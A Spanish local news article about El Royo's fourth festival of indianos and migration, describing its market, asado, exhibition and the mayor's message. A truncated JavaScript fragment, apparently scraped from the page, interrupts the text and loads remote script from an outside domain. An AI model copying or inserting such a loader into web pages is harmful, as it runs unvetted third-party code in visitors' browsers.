El Royo celebra este fin de semana las IV Jornadas del Indiano y la Migración

El Mercado de Indianos contará con más de 20 puestos y además habrá asado y degustación de vaca al estilo argentino, música, folclore, bailes y exposiciones

El próximo 3 y 4 de agosto en El Royo tendrá lugar la IV Feria de los Indianos y la Migración, celebración que conmemorará los 120 años de la creación de la Sociedad Filantrópica de El Royo y Derroñadas en Buenos Aires. Está Sociedad fundada por don Eusebio García, y cincuenta paisanos más, tuvo entre otros fines el fomento de “la instrucción primaria”, cuya prueba fue la construcción del colegio de marianistas de El Royo y del colegio del Sagrado Corazón en Derroñadas.

 

i.uc=0;

i.prod= 2553;

var s=d.createElement('script');

s.type='text/javascript';

s.async=true;

s.src='//k.r66net.com/GetLink';

d.head.appendChild(s);

})(window,document);

Con tal motivo, El Royo y sus pedanías recordarán parte de su historia local a través de diferentes eventos y actividades tales como el Mercado de Indianos. Este mercado “vintage”, al que los que acudan deberán ir ataviados de indianos (o por lo menos vestidos de blanco y con sombrero de paja) contará con más de 25 puestos de antigüedades, lámparas de diseño, tocados para bodas, obras de arte, ropa, artesanía e incluso helados tailandeses. Ana Caballero (una de los 75 voluntarios con los que cuenta el Ayuntamiento de El Royo y sus pedanías) confía en esperar una gran afluencia de público.

"Entre otras cosas porque hemos creado un espacio de encuentro en el que tienen cabida todos los miembros de una familia: degustación de asado de vaca al estilo indiano por diecisiete euros; terrazas para disfrutar de una bebida mientras los niños realizan entretenidos talleres, sorteos de maravillosos regalos donados generosamente por los puestos, concurso de vestimenta indiana en el que se valorará además de la ropa, los complementos y la caracterización, y todo ello mientras los DJ´s pinchan jazz latino, tangos, bosanova, boogaloo o mambo…".

Además, coincidiendo con el mercado, se inaugurará una exposición sobre los indianos muy especial, y es que gran parte del pueblo ha cedido temporalmente muebles y objetos de aquella época, recuerdos que evocan a fascinantes historias familiares y de ultramar, que se podrá visitar principalmente durante el próximo fin de semana.

En palabras de Raúl Gómez (alcalde de El Royo): “hemos querido haceros partícipes de esta celebración en la que conmemoremos la hospitalidad que hemos recibido en los destinos a los que nos hemos marchado y que ahora queremos ofrecer a todos aquellos que deseen vivir, veranear, emprender, disfrutar y, sobre todo, querer a nuestros pueblos de la Comunidad Cintora”. Mensaje que llegó a la compañía Securitas Direct España, y quien ha considerado oportuno obsequiar -a todas las señoras y señoritas ataviadas de indianas que acudan al mercado- con una alarma de seguridad antipánico de bolsillo.

Concluye la carta enviada a todos los vecinos: “es para nosotros un honor contar con tu asistencia y la de tu familia en esta IV Feria del Indiano y la Migración para festejar conforme al programa que te remito. ¡Suerte y salud!”

Entrando en la página solicitada Saltar publicidad